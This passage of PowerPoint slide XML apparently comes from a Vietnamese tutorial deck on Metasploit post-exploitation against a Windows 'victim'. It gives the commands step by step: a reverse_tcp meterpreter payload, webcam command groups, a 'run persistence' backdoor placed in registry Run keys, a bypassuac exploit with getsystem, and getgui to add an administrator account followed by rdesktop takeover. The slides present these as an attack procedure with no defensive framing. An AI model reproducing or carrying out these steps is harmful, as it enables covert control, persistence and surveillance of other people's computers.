              <a:t> để chờ nhận kết quả, nếu victim kích hoạt payload và không bị lỗi gì thì sẽ có một thống báo: “meterpreter session 1 opened</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”.</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7711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4339650"/>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smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Khai thác khi exploit thành công</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1"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sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Core Commands: nhóm lệnh chính.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File System Commands: nhóm lệnh quản lý file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Networking Commands: nhóm lệnh quản trị mạng.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>System Commands: nhóm lệnh hệ thống.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User Interface Commands: nhóm lệnh giao điện người dùng.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webcam Commands: nhóm lệnh điều khiển webcam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Three Priv Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3793188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24</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4010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2724946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5078313"/>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smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thiết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lập persistence để cài vĩnh viễn và tự động kích hoạt trên máy victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>run persistence -S -i 60 -p [cổng] -r [ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Khi đó payload sẽ tạo ra file .vbs mặc định được lưu vào trong đường dẫn C:\Users\tên_người_dùng\AppData\Local\Temp và chèn thuộc tính autorun vào registry HKCU(hay HKLM)\Software\Microsoft\Windows\CurrentVersion\Run\ .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1187166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5078313"/>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smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Leo thang đặc quyền (Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Tại </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dấu nhắc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“msf &gt;”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> gõ lệnh:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>use exploit/windows/local/bypassuac</a:t>
            </a:r>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b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set session [mã_phiên]: nhập mã phiên làm việc hiện tại.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set target [giá_trị]: mặc định giá trị là 0 tuơng ứng với kiến trúc 32bit.</a:t>
            </a:r>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b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="240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Trở lại phiên session đang làm việc gõ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1"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getuid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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để kiểm tra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authority/System &lt;&lt;&lt; Nếu chưa - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28231937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4708981"/>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smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Điều khiển màn hình máy victim từ xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cách 1:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" smtClean="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mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ở dấu nhắc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, gõ lệnh run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>getgui -e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> để kích hoạt điều khiển từ xa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nếu thành công thì tiếp tục </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>run getgui -u [tên] -p [mật_khẩu]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> để tạo một tài khoản administrator kèm mật khẩu vào máy nạn nhân.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nếu thành công tiếp thì mở một cửa sổ terminal khác, chạy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rdesktop -u [tên] -p [mật_khẩu] [ip_nạn_nhân]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, để kết nối tới máy nạn nhân và yêu cầu quyền điều khiển</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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28</a:t>
            </a:fld>
